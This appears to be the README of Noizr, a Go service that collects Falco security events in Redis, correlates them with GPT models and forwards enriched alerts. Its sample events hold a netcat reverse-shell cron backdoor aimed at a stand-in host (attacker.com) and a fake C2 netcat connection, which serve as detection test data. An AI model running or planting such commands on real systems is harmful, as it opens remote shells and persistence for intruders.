Noizr is a modular, scalable system for processing security events from Falco and other security tools. It uses AI to analyze and correlate events, identifying real threats and providing detailed summaries and recommendations.
Noizr uses a microservices architecture with three main components that work together to process security events:
┌────────────────┐     ┌─────────────┐     ┌────────────────┐     ┌───────────────┐
│                │     │             │     │                │     │               │
│   Security     │────▶│    Event    │────▶│  Redis Stream  │────▶│     Event     │
│ Tools (Falco)  │     │  Receiver   │     │  (Raw Events)  │     │   Processor   │
│                │     │             │     │                │     │  (AI-based)   │
└────────────────┘     └─────────────┘     └────────────────┘     └───────┬───────┘
                                                                          │
                                                                          │ Enriched
                                                                          │ Events
                                                                          ▼
                    ┌────────────────┐     ┌────────────────┐     ┌───────────────┐
                    │                │     │                │     │  Redis List   │
                    │   External     │◀────│     Event      │◀────│  (Processed   │
                    │   Systems      │     │   Forwarder    │     │   Events)     │
                    │                │     │                │     │               │
                    └────────────────┘     └────────────────┘     └───────────────┘
- Security tools (e.g., Falco) send events to the Event Receiver via webhooks
- Raw events are stored in Redis Streams for efficient time-series processing
- The Event Processor periodically analyzes recent events using AI to:
- Correlate related events
- Determine if events represent a real threat
- Generate a detailed summary and recommendation
- High-confidence threats are stored as enriched events in a Redis list (`noizr:enriched_events`)
- The Alert Forwarder consumes events from the Redis list and forwards them to external systems (e.g., SIEMs, alerting platforms)
The Event Receiver provides a webhook API for receiving security events from various sources.
- HTTP service that listens on a configurable port
- Currently supports Falco events at `/api/events/falco`
- Validates and standardizes incoming events
- Stores events in Redis Streams for processing
- Includes a health check endpoint at `/health`
Example Falco event JSON structure:
{
"output": "Suspicious process spawned in container (user=root command=sh container=webapp)",
"priority": "Warning",
"rule": "Launch Privileged Shell",
"source": "container",
"time": "2023-11-10T14:53:12.345Z",
"output_fields": {
"user.name": "root",
"proc.cmdline": "sh -c echo 'hello'",
"container.id": "61616161",
"container.name": "webapp"
}
}

Redis Streams are used as the central event store, providing:
- Time-ordered event storage
- Efficient retrieval of events within a time window
- Pub/Sub capabilities for notifying the forwarder
- Persistence for processed events
Key Redis structures used:
- `noizr:events:raw` - Stream of raw security events
- `noizr:events:processed` - Hash containing processed/enriched events
- `noizr:events:processed:new` - Pub/Sub channel for new processed events
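For illustration, the sketch below appends a raw event to the `noizr:events:raw` stream and reads it back with the `github.com/redis/go-redis/v9` client. It is a minimal example rather than the actual `pkg/store` implementation, and the field names written to the stream are assumptions.

package main

import (
	"context"
	"fmt"

	"github.com/redis/go-redis/v9"
)

func main() {
	ctx := context.Background()
	rdb := redis.NewClient(&redis.Options{Addr: "localhost:6379"})

	// Append a raw event; "*" lets Redis assign a time-ordered stream ID.
	err := rdb.XAdd(ctx, &redis.XAddArgs{
		Stream: "noizr:events:raw",
		Values: map[string]interface{}{
			"rule":     "Launch Privileged Shell",
			"priority": "Warning",
			"payload":  `{"output":"Suspicious process spawned in container"}`,
		},
	}).Err()
	if err != nil {
		panic(err)
	}

	// Read back everything currently in the stream; a real consumer would
	// bound the range by stream IDs to retrieve only the correlation window.
	entries, err := rdb.XRange(ctx, "noizr:events:raw", "-", "+").Result()
	if err != nil {
		panic(err)
	}
	for _, e := range entries {
		fmt.Println(e.ID, e.Values["rule"])
	}
}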
The AI-powered Event Processor analyzes security events to identify threats:
- Runs on a configurable interval (default: 60 seconds)
- Retrieves events within a correlation timeframe (default: 5 minutes)
- Uses OpenAI's GPT models to analyze events (extensible to other AI providers)
- Applies confidence scoring to reduce false positives
- Enriches events with summaries, severity ratings, and remediation recommendations
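In outline, that loop looks something like the sketch below. The `Store` and `Provider` interfaces, the stub event types, and the field names are illustrative stand-ins for `pkg/store`, `pkg/ai`, and `pkg/models`, not the actual `cmd/processor` code.

import (
	"context"
	"log"
	"time"
)

// FalcoEvent and EnrichedEvent stand in for the types in pkg/models.
type FalcoEvent map[string]interface{}

type EnrichedEvent struct {
	Summary         string
	Severity        string
	ConfidenceScore float64
}

// Store and Provider are hypothetical stand-ins for pkg/store and pkg/ai.
type Store interface {
	RecentEvents(ctx context.Context, window time.Duration) ([]FalcoEvent, error)
	SaveEnriched(ctx context.Context, ev *EnrichedEvent) error
}

type Provider interface {
	AnalyzeEvents(ctx context.Context, events []FalcoEvent) (*EnrichedEvent, error)
}

// runProcessor polls the recent raw-event window, asks the AI provider for an
// analysis, and keeps only results above the confidence threshold.
func runProcessor(ctx context.Context, st Store, ai Provider) {
	ticker := time.NewTicker(60 * time.Second) // analysis interval
	defer ticker.Stop()

	for {
		select {
		case <-ctx.Done():
			return
		case <-ticker.C:
			events, err := st.RecentEvents(ctx, 5*time.Minute) // correlation timeframe
			if err != nil || len(events) == 0 {
				continue
			}
			enriched, err := ai.AnalyzeEvents(ctx, events)
			if err != nil {
				log.Printf("AI analysis failed: %v", err)
				continue
			}
			if enriched.ConfidenceScore < 0.7 { // min_confidence_score
				continue // discard low-confidence results to reduce false positives
			}
			if err := st.SaveEnriched(ctx, enriched); err != nil {
				log.Printf("failed to store enriched event: %v", err)
			}
		}
	}
}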
The AI analysis uses a specialized prompt that instructs the model to:
- Analyze security events for patterns indicating real threats
- Determine a severity level (Low, Medium, High, Critical)
- Provide a concise summary of the threat
- Recommend mitigation actions
- Assign a confidence score to the analysis
Example of an enriched event:
{
"id": "b78a4d2e1c06f952",
"original_events": [
{
"output": "Suspicious process spawned in container (user=root command=sh container=webapp)",
"priority": "Warning",
"rule": "Launch Privileged Shell",
"source": "container",
"time": "2023-11-10T14:53:12.345Z",
"output_fields": {
"user.name": "root",
"proc.cmdline": "sh -c echo 'hello'",
"container.id": "61616161",
"container.name": "webapp"
}
},
{
"output": "File created below /etc by untrusted program (user=root command=sh file=/etc/cron.d/backdoor)",
"priority": "Critical",
"rule": "File Created Below /etc",
"source": "container",
"time": "2023-11-10T14:53:14.456Z",
"output_fields": {
"user.name": "root",
"proc.cmdline": "sh -c echo '* * * * * root /bin/nc -e /bin/bash attacker.com 4444' > /etc/cron.d/backdoor",
"container.id": "61616161",
"container.name": "webapp",
"fd.name": "/etc/cron.d/backdoor"
}
}
],
"summary": "Possible container compromise and persistence mechanism via cron job backdoor",
"severity": "Critical",
"recommendation": "Immediately isolate the container, investigate the source of the compromise, verify image integrity, and review container privileges",
"created_at": "2023-11-10T14:54:00.123Z",
"confidence_score": 0.95
}

The Alert Forwarder delivers processed alerts to external systems:
- Listens for newly processed events via Redis Pub/Sub
- Forwards enriched events to a configurable webhook endpoint
- Provides authentication via bearer tokens
- Implements retry logic with exponential backoff (see the delivery sketch after this list)
- Can be disabled if not needed
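The delivery step described above (JSON POST with an optional bearer token and exponential back-off) might look roughly like this sketch; the function name and parameters are illustrative, not the actual `cmd/forwarder` implementation. A caller would marshal the enriched event with `json.Marshal` and pass the resulting bytes as `payload`.

import (
	"bytes"
	"context"
	"fmt"
	"net/http"
	"time"
)

// forwardWithRetry POSTs an enriched event (already marshalled to JSON) to the
// configured webhook, retrying with exponential back-off on failure.
func forwardWithRetry(ctx context.Context, client *http.Client, url, token string, payload []byte, retries int) error {
	backoff := time.Second
	var lastErr error

	for attempt := 0; attempt <= retries; attempt++ {
		req, err := http.NewRequestWithContext(ctx, http.MethodPost, url, bytes.NewReader(payload))
		if err != nil {
			return err
		}
		req.Header.Set("Content-Type", "application/json")
		if token != "" {
			req.Header.Set("Authorization", "Bearer "+token) // forwarder.auth_token
		}

		resp, err := client.Do(req)
		if err == nil {
			resp.Body.Close()
			if resp.StatusCode < 300 {
				return nil // delivered
			}
			lastErr = fmt.Errorf("webhook returned %s", resp.Status)
		} else {
			lastErr = err
		}

		time.Sleep(backoff) // back off before the next attempt
		backoff *= 2
	}
	return lastErr
}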
- Kubernetes cluster
- Helm 3+
- Docker (for building and local development)
- OpenAI API key (or other AI provider credentials)
- Redis (standalone or cluster)
- Clone the repository:

git clone https://github.com/your-org/noizr.git
cd noizr

- Create a values file with your configuration:

cat > values-custom.yaml << EOF
config:
  openai:
    api_key: "your-openai-api-key"
    model: "gpt-4"  # or gpt-3.5-turbo for lower cost
    temperature: 0.1
    max_tokens: 1024
  forwarder:
    enabled: true
    url: "https://your-webhook-endpoint.com"
    auth_token: "your-webhook-auth-token"
    retry_count: 3
  processor_settings:
    correlation_timeframe_minutes: 5
    min_confidence_score: 0.7
    idle_processing_threshold_seconds: 60
receiver:
  replicaCount: 2
  service:
    type: ClusterIP  # Change to LoadBalancer if needed for external access
redis:
  enabled: true  # Set to false if using an external Redis instance
  auth:
    password: "your-secure-redis-password"  # Leave empty for auto-generated
  master:
    persistence:
      size: 8Gi
EOF

- Install with Helm:

helm install noizr ./deployments/helm -f values-custom.yaml

- Verify the installation:

kubectl get pods -l app=noizr-receiver
kubectl get pods -l app=noizr-processor
kubectl get pods -l app=noizr-forwarder

- Access the receiver service:

# If using ClusterIP
kubectl port-forward svc/noizr-receiver 8080:8080

# If using LoadBalancer
export SERVICE_IP=$(kubectl get svc noizr-receiver -o jsonpath='{.status.loadBalancer.ingress[0].ip}')
echo "Service available at: http://$SERVICE_IP:8080"
If you're using an existing Redis instance:
- Update your values file:

redis:
  enabled: false  # Disable built-in Redis
config:
  redis:
    address: "your-redis-host:6379"
    password: "your-redis-password"
    db: 0

- Ensure your Redis instance is configured with:
  - Persistence enabled (AOF or RDB)
  - Enough memory for your expected event volume
  - Network access from your Kubernetes cluster
To build and push the Docker images:
# Build the image
docker build -t your-registry.com/your-org/noizr:latest -f deployments/docker/Dockerfile .
# Push to your registry
docker push your-registry.com/your-org/noizr:latest
# Update Helm values to use your image
cat > values-image.yaml << EOF
receiver:
  image:
    repository: your-registry.com/your-org/noizr
    tag: latest
processor:
  image:
    repository: your-registry.com/your-org/noizr
    tag: latest
forwarder:
  image:
    repository: your-registry.com/your-org/noizr
    tag: latest
EOF
# Apply the updated image values
helm upgrade noizr ./deployments/helm -f values-custom.yaml -f values-image.yaml

Noizr is configured via a YAML configuration file and environment variables, with the following key options:
| Parameter | Description | Default |
|---|---|---|
| `server.port` | HTTP server port | 8080 |

| Parameter | Description | Default |
|---|---|---|
| `redis.address` | Redis server address | "noizr-redis-master:6379" |
| `redis.password` | Redis password | "" |
| `redis.db` | Redis database index | 0 |

| Parameter | Description | Default |
|---|---|---|
| `openai.api_key` | OpenAI API key | "" |
| `openai.model` | OpenAI model to use | "gpt-4" |
| `openai.temperature` | Model temperature (randomness) | 0.1 |
| `openai.max_tokens` | Maximum tokens in response | 1024 |
| `openai.system_prompt` | Custom system prompt | Built-in default |

| Parameter | Description | Default |
|---|---|---|
| `forwarder.enabled` | Enable the forwarder | false |
| `forwarder.url` | Webhook URL | "https://example.com/webhook" |
| `forwarder.auth_token` | Authentication token | "" |
| `forwarder.retry_count` | Number of retries | 3 |

| Parameter | Description | Default |
|---|---|---|
| `processor_settings.correlation_timeframe_minutes` | Event correlation window | 5 |
| `processor_settings.min_confidence_score` | Minimum confidence threshold | 0.7 |
| `processor_settings.idle_processing_threshold_seconds` | Flush batch if no events arrive for this many seconds | 60 |
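For reference, these options could map onto a Go configuration struct roughly as sketched below. The struct layout, yaml tags, and loader are assumptions for illustration; the real definitions live in pkg/config/config.go.

import (
	"os"

	"gopkg.in/yaml.v3"
)

// Config mirrors the documented configuration keys (illustrative only).
type Config struct {
	Server struct {
		Port int `yaml:"port"`
	} `yaml:"server"`
	Redis struct {
		Address  string `yaml:"address"`
		Password string `yaml:"password"`
		DB       int    `yaml:"db"`
	} `yaml:"redis"`
	OpenAI struct {
		APIKey      string  `yaml:"api_key"`
		Model       string  `yaml:"model"`
		Temperature float64 `yaml:"temperature"`
		MaxTokens   int     `yaml:"max_tokens"`
	} `yaml:"openai"`
	Forwarder struct {
		Enabled    bool   `yaml:"enabled"`
		URL        string `yaml:"url"`
		AuthToken  string `yaml:"auth_token"`
		RetryCount int    `yaml:"retry_count"`
	} `yaml:"forwarder"`
	ProcessorSettings struct {
		CorrelationTimeframeMinutes    int     `yaml:"correlation_timeframe_minutes"`
		MinConfidenceScore             float64 `yaml:"min_confidence_score"`
		IdleProcessingThresholdSeconds int     `yaml:"idle_processing_threshold_seconds"`
	} `yaml:"processor_settings"`
}

// Load reads and parses a YAML config file.
func Load(path string) (*Config, error) {
	data, err := os.ReadFile(path)
	if err != nil {
		return nil, err
	}
	var cfg Config
	if err := yaml.Unmarshal(data, &cfg); err != nil {
		return nil, err
	}
	return &cfg, nil
}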
/
├── cmd/
│ ├── receiver/ # Webhook receiver service
│ ├── processor/ # AI processor service
│ ├── forwarder/ # Alert forwarder service
├── pkg/
│ ├── models/ # Shared data models
│ ├── store/ # Store implementation (Redis)
│ ├── ai/ # AI client implementations
│ ├── config/ # Configuration
│ ├── logger/ # Logging utilities
├── deployments/
│ ├── helm/ # Helm charts
│ ├── docker/ # Dockerfiles
├── README.md
└── go.mod
For local development:
- Start Redis locally:

docker run -d -p 6379:6379 --name noizr-redis redis:alpine

- Create a local config file:

cat > config.yaml << EOF
server:
  port: 8080
redis:
  address: "localhost:6379"
  password: ""
  db: 0
openai:
  api_key: "your-openai-api-key"
  model: "gpt-4"
processor_settings:
  correlation_timeframe_minutes: 5
  min_confidence_score: 0.7
  idle_processing_threshold_seconds: 60
forwarder:
  enabled: false
EOF

- Run the services (each in a separate terminal):

# Run the receiver
go run cmd/receiver/main.go --config . --log-level debug

# Run the processor
go run cmd/processor/main.go --config . --log-level debug

# Run the forwarder if needed
go run cmd/forwarder/main.go --config . --log-level debug
Run the tests with:
go test ./...
# Run with coverage
go test -cover ./...
# Generate coverage report
go test -coverprofile=coverage.out ./...
go tool cover -html=coverage.out

To test the system, you can send a sample Falco event:
curl -X POST http://localhost:8080/api/events/falco \
-H "Content-Type: application/json" \
-d '{
"output": "Suspicious outbound connection to C2 server (user=root command=nc ip=203.0.113.100)",
"priority": "Critical",
"rule": "Outbound Connection to C2 Server",
"source": "syscall",
"output_fields": {
"user.name": "root",
"proc.cmdline": "nc 203.0.113.100 4444",
"fd.sip": "10.0.0.2",
"fd.dip": "203.0.113.100",
"fd.dport": 4444
}
}'

To test the entire pipeline, including the AI processing and forwarding:
- Set up a test webhook receiver (e.g., using Webhook.site or RequestBin)
- Configure the forwarder to send to your test endpoint:
forwarder:
  enabled: true
  url: "https://webhook.site/your-unique-id"
  auth_token: ""
- Send several related security events
- Check the processor logs to see the AI analysis
- Verify the enriched event is received at your test webhook endpoint
Noizr exposes Prometheus metrics on the /metrics endpoint, including:
- Event processing rates and latencies
- AI analysis times
- Error counts
- Queue sizes
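The sketch below shows how metrics of this kind are typically defined and served with the Prometheus Go client. The metric names, labels, and port are illustrative assumptions, not Noizr's actual metric set.

package main

import (
	"log"
	"net/http"

	"github.com/prometheus/client_golang/prometheus"
	"github.com/prometheus/client_golang/prometheus/promhttp"
)

var (
	// Hypothetical metric names; Noizr's exported names may differ.
	eventsProcessed = prometheus.NewCounterVec(
		prometheus.CounterOpts{Name: "noizr_events_processed_total", Help: "Processed events, by severity."},
		[]string{"severity"},
	)
	aiAnalysisSeconds = prometheus.NewHistogram(
		prometheus.HistogramOpts{Name: "noizr_ai_analysis_seconds", Help: "AI analysis latency in seconds."},
	)
)

func main() {
	prometheus.MustRegister(eventsProcessed, aiAnalysisSeconds)

	// Record a sample observation.
	eventsProcessed.WithLabelValues("Critical").Inc()
	aiAnalysisSeconds.Observe(1.8)

	// Serve the standard /metrics endpoint (port is arbitrary here).
	http.Handle("/metrics", promhttp.Handler())
	log.Fatal(http.ListenAndServe(":2112", nil))
}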
Noizr uses structured JSON logging with configurable levels:
- `debug` - Detailed debugging information
- `info` - General operational information
- `warn` - Warning conditions
- `error` - Error conditions
Logs can be collected using standard Kubernetes logging tools like Fluentd, Logstash, or the ELK stack.
Recommended resource allocations:
| Component | CPU | Memory |
|---|---|---|
| Receiver | 0.5-1 cores | 512MB-1GB |
| Processor | 1-2 cores | 1-2GB |
| Forwarder | 0.5 cores | 512MB |
| Redis | 1-2 cores | 2-4GB |
For high-volume environments, scale the receiver horizontally and increase Redis resources.
To back up the system:
- Set up Redis persistence (AOF and RDB)
- Regularly back up Redis data
- Store configuration securely
To restore:
- Deploy Noizr components
- Restore Redis data
- Apply saved configuration
Problem: Events are not being received
- Verify network connectivity to the receiver
- Check for HTTP status codes in the logs
- Ensure the receiver service is running (`kubectl get pods`)
Problem: Events are received but not stored
- Check Redis connectivity in receiver logs
- Verify Redis authentication settings
Problem: Events are not being processed
- Check if the processor is running (`kubectl get pods`)
- Look for errors in the processor logs
- Verify OpenAI API key is valid
- Check if the correlation timeframe is too short
Problem: AI analysis is too slow
- Consider using a faster model (e.g., gpt-3.5-turbo instead of gpt-4)
- Increase processor resources
- Adjust the analysis interval
Problem: Processed events are not being forwarded
- Verify the forwarder is enabled in the configuration
- Check the target webhook URL is accessible
- Look for retry errors in the forwarder logs
You can check the Redis store directly to debug issues:
# Get a shell in the Redis pod
kubectl exec -it noizr-redis-master-0 -- redis-cli
# List raw events in the stream
XRANGE noizr:events:raw - +
# Check processed events
HGETALL noizr:events:processed

To add support for new event sources:
- Create a new endpoint in the Event Receiver (`cmd/receiver/main.go`):

router.HandleFunc("/api/events/new-source", func(w http.ResponseWriter, r *http.Request) {
	var event models.NewSourceEvent
	decoder := json.NewDecoder(r.Body)
	if err := decoder.Decode(&event); err != nil {
		// Handle error
	}
	// Process and store the event
}).Methods("POST")

- Define appropriate data models in `pkg/models/event.go`:

// NewSourceEvent represents events from the new source
type NewSourceEvent struct {
	// Define fields
}

- Add parsing logic for the new event format
To add support for alternative AI providers:
- Create a new package in `pkg/ai/` (e.g., `pkg/ai/azureopenai/`)

- Implement the `ai.Provider` interface:

package azureopenai

// Provider implements the ai.Provider interface for the new backend
type Provider struct {
	// Provider-specific fields
}

func New( /* provider-specific config */ ) ai.Provider {
	// Initialize provider
}

// Implement required interface methods
func (p *Provider) AnalyzeEvents(ctx context.Context, events []models.FalcoEvent) (*models.EnrichedEvent, error) {
	// Provider-specific implementation
}

func (p *Provider) Close() error {
	// Cleanup logic
}

- Add configuration options in `pkg/config/config.go`

- Update the processor to use the new provider
For high-volume environments:
- Scale the receiver horizontally:

kubectl scale deployment noizr-receiver --replicas=5

- Optimize Redis:
  - Use Redis Cluster for horizontal scaling
  - Configure appropriate maxmemory settings
  - Set up proper eviction policies

- Process events in batches:
  - Adjust the processor's analysis interval
  - Implement batch processing to reduce API calls
To optimize AI usage and costs:
- Use pre-filtering to reduce events sent to AI
- Implement caching for similar event patterns (see the sketch after this list)
- Consider using less expensive models for initial screening
- Use token optimization techniques in your prompts
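As an illustration of the caching idea, a small in-memory pre-filter could remember which rule/container combinations were analyzed recently and skip near-duplicates for a TTL. The type and method names below are assumptions, not part of Noizr.

import (
	"sync"
	"time"
)

// analysisCache remembers recently analyzed event patterns so near-duplicates
// are not re-sent to the AI within the TTL.
type analysisCache struct {
	mu   sync.Mutex
	seen map[string]time.Time
	ttl  time.Duration
}

func newAnalysisCache(ttl time.Duration) *analysisCache {
	return &analysisCache{seen: make(map[string]time.Time), ttl: ttl}
}

// shouldAnalyze returns false if a similar event (same rule and container)
// was already analyzed within the TTL, and records the pattern otherwise.
func (c *analysisCache) shouldAnalyze(rule, container string, now time.Time) bool {
	c.mu.Lock()
	defer c.mu.Unlock()

	key := rule + "|" + container
	if last, ok := c.seen[key]; ok && now.Sub(last) < c.ttl {
		return false
	}
	c.seen[key] = now
	return true
}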
Planned enhancements for Noizr:
- Additional Event Sources
  - Support for CloudTrail logs
  - Support for Wazuh events
  - Generic webhook adapter for custom sources

- Enhanced AI Capabilities
  - Local model support (e.g., llama.cpp)
  - Hybrid approach using rules + AI
  - Fine-tuning for specific security domains

- Visualization and UI
  - Web dashboard for event monitoring
  - Threat visualization and timeline
  - Interactive remediation recommendations

- Advanced Correlation
  - Cross-source event correlation
  - Persistent threat tracking
  - Attack chain reconstruction
This project is licensed under the Apache License, Version 2.0 - see the LICENSE file for details.
Contributions are welcome! Please feel free to submit a Pull Request.
For support, please open an issue on the GitHub repository or contact the maintainers.
Noizr includes a test script that simulates a complete attack sequence to demonstrate the system's correlation and analysis capabilities.
The test-attack-sequence.sh script sends a sequence of six Falco events that represent different stages of a container escape and data exfiltration attack:
- Initial Access: Shell spawned in a container
- Reconnaissance: Sensitive file access
- Privilege Escalation: Adding CAP_SYS_ADMIN capability
- Container Escape: Mount operation from inside container
- Data Exfiltration: Outbound connection to C2 server
- Persistence: Cron job creation
Before running the test script, ensure:
- Redis is running:

make dev-env

- The receiver component is running:

./bin/receiver --config ./my-config.yaml --log-level debug

- The processor component is running:

./bin/processor --config ./my-config.yaml --log-level debug
Execute the script:
./test-attack-sequence.sh

The script will send each event with a 7-second delay between them, showing the progress and status of each request.
Watch the processor's output to see:
- Each event being processed individually
- Events being correlated as part of the same attack sequence
- AI analysis detecting the attack pattern
- A comprehensive security event with:
- Detailed attack summary
- Severity assessment
- Recommended actions
- Confidence score
You can modify the script to adjust:
- The delay between events (`DELAY_BETWEEN_EVENTS` variable)
- The API endpoint (`API_ENDPOINT` variable)
- The details of individual events to test different scenarios
This test script is valuable for demonstrating Noizr's capabilities, testing your configuration, and understanding how the system processes attack sequences.
# compile all three binaries
make build
# start the receiver & processor (debug for extra logs)
./bin/receiver --config my-config.yaml --log-level debug &
./bin/processor --config my-config.yaml --log-level debug &
# start the forwarder **only if `forwarder.enabled: true`**
./bin/forwarder --config my-config.yaml --log-level info &

Falco → receiver (stores raw events in Redis stream)
↓
processor (correlates, calls OpenAI, writes enriched events to
Redis list `noizr:enriched_events`)
↓
forwarder (BRPOP on the list, HTTP-POSTs to your webhook)
The processor will flush a workload batch when:
- the correlation window (`correlation_timeframe_minutes`) is reached, or
- no new events arrive for `idle_processing_threshold_seconds` (see the sketch after the example log line below).
Idle checks run every 10 s and include both "idle time" and "total time"
in the debug log line:
IDLE CHECK: Workload … idle for 45s (threshold: 60s) | total 2m15s | events: 12
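A compact sketch of that flush decision (parameter names are illustrative; the actual processor code may differ):

import "time"

// shouldFlush reports whether the current workload batch should be analyzed:
// either the correlation window has elapsed since the batch started, or no new
// events have arrived for the idle threshold.
func shouldFlush(windowStart, lastEventAt, now time.Time, windowMinutes, idleSeconds int) bool {
	window := time.Duration(windowMinutes) * time.Minute // correlation_timeframe_minutes
	idle := time.Duration(idleSeconds) * time.Second     // idle_processing_threshold_seconds
	return now.Sub(windowStart) >= window || now.Sub(lastEventAt) >= idle
}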
# Add the Bitnami repo for Redis dependency
helm repo add bitnami https://charts.bitnami.com/bitnami
# Install Noizr with custom values
helm dependency update ./deployments/helm
helm upgrade --install noizr -n noizr --create-namespace ./deployments/helm -f values-custom.yaml

Install Falco in the same namespace, configured to send events to the Noizr receiver:
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update
helm upgrade --install falco falcosecurity/falco \
--namespace noizr --create-namespace \
--set falco.http_output.enabled=true \
--set falco.http_output.url="http://noizr-receiver.noizr.svc.cluster.local:8080/api/events/falco" \
--set falco.json_output=true \
--set falco.json_include_output_property=true

This one-liner installs Falco with:
- JSON-formatted output
- HTTP output enabled and pointing to the Noizr receiver service
- 5-second timeout for HTTP requests
To test the system with realistic security events, deploy the Falco event generator:
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update
# wait for the noizr deployment to be ready
kubectl wait --for=condition=ready pod -l app=noizr -n noizr
helm upgrade --install eg falcosecurity/event-generator \
--namespace noizr --create-namespace \
--set config.command=run \
--set config.loop=false \
--set-string config.sleep="0s" \
--set-string config.actions='syscall.(RunShellUntrusted|ChangeThreadNamespace|ReadSensitiveFileUntrusted|WriteBelowBinaryDir|NetcatRemoteCodeExecutionInContainer|InterpretedProcsOutboundNetworkActivity|SetSetuidOrSetgidBit|ScheduleCronJobs|RemoveBulkDataFromDisk|ModifyShellConfigurationFile)$'

This command deploys the event generator to:
- Generate a variety of security events that will trigger Falco rules
- Run each action once (non-looping)
- Execute actions without delay between them
- Focus on common attack patterns like untrusted shells, namespace changes, sensitive file access, and more
You should see events flowing from Falco to Noizr within seconds of deployment.
server:
  port: 8080

redis:
  address: "localhost:6379"
  password: ""
  db: 0

openai:
  api_key: "<your-key>"
  model: "gpt-4"
  temperature: 0.1
  max_tokens: 1024
  # system_prompt: "optional custom prompt"

# Forward every enriched event as JSON to an external HTTP endpoint.
# The forwarder binary must be running and `enabled` set to true.
forwarder:
  enabled: true
  url: "https://webhook.site/<id>"
  auth_token: ""   # optional Bearer token
  retry_count: 3   # exponential back-off retries on failure

processor_settings:
  correlation_timeframe_minutes: 5        # batch window
  min_confidence_score: 0.7
  idle_processing_threshold_seconds: 60   # flush early if idle

| Key | Default | Description |
|---|---|---|
| `forwarder.enabled` | `false` | Start the forwarder and send webhook requests |
| `forwarder.auth_token` | `""` | Added as `Authorization: Bearer` header |
| `forwarder.retry_count` | `3` | Times a failed POST is retried with back-off |
| `processor_settings.idle_processing_threshold_seconds` | `60` | Flush batch if no events arrive for this many seconds |
Use --log-level debug to enable verbose, pretty-printed JSON output of each
incoming Falco event. Helper functions logger.IsDebug()/IsInfo() replace
direct checks on logrus levels, avoiding extra imports.
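Such helpers can be as simple as the following sketch built on logrus (an assumption; the real pkg/logger code may differ):

package logger

import log "github.com/sirupsen/logrus"

// IsDebug reports whether debug-level logging is enabled.
func IsDebug() bool { return log.IsLevelEnabled(log.DebugLevel) }

// IsInfo reports whether info-level (or more verbose) logging is enabled.
func IsInfo() bool { return log.IsLevelEnabled(log.InfoLevel) }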
The repo ships with test-attack-sequence.sh which replays a sample Falco
JSON stream. Launch all three services (receiver, processor, forwarder) then
run:
./test-attack-sequence.sh

You should see:
- Receiver logs each Falco event.
- Processor logs `🔔 IDLE THRESHOLD REACHED` (or `🔄 WINDOW COMPLETE`) followed by `Stored processed event …`.
- Forwarder logs `forwarded event … (severity …)` and the webhook receives the JSON.
# Start Redis in Docker
make dev-env
# Run components in development mode
make run-receiver
make run-processor
make run-forwarder
# Stop development environment
make dev-env-stop

# Build multi-architecture Docker image (linux/amd64, linux/arm64)
make docker-build

- Redis Connection Errors: Ensure Redis is running and accessible. Check the Redis password if authentication is enabled.
- OpenAI API Errors: Verify your API key is valid and has sufficient quota.
- Forwarder Not Sending Events: Check that `forwarder.enabled` is set to `true` in your config file.
- Falco Not Sending Events: Verify the Falco HTTP output is correctly configured to point to your Noizr receiver endpoint.
# View logs for each component
kubectl logs -l app=noizr-receiver
kubectl logs -l app=noizr-processor
kubectl logs -l app=noizr-forwarder
kubectl logs -l app=falco